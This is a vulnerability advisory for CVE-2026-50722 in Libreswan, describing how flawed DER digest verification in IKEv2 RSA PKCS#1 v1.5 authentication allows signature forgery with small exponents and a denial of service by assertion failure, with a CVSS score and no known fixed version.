PT-2026-55316 · Libreswan · Libreswan

Andrew Cagney

+2

·

Published

2026-07-02

·

Updated

2026-07-02

·

CVE-2026-50722

CVSS v3.1

8.1

High

VectorAV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions Libreswan (affected versions not specified)
Description Libreswan fails to correctly verify the DER encoding of the ASN.1 digest within the IKEv2 AUTH payload when using RSASSA-PKCS1-v1 5. This occurs in the RSA authenticate hash signature pkcs1 1 5 rsa() function. A remote attacker can exploit this using a variation of the Bleichenbacher attack—a method of attacking RSA encryption—to forge the AUTH payload when small public exponents (such as e=3) are used, allowing for impersonation. Furthermore, an attacker can cause a denial-of-service by encoding a hash shorter than expected in the AUTH payload, which triggers an assertion that causes the daemon to abort and restart. Remote code execution is not possible, and X.509 certificate verifications of the remote IKE peer remain unaffected.
Recommendations At the moment, there is no information about a newer version that contains a fix for this vulnerability.

Assertion Failure

Improper Verification of Cryptographic Signature

Found an issue in the description? Have something to add? Feel free to write us 👾

Weakness Enumeration

Related Identifiers

CVE-2026-50722

Affected Products

Libreswan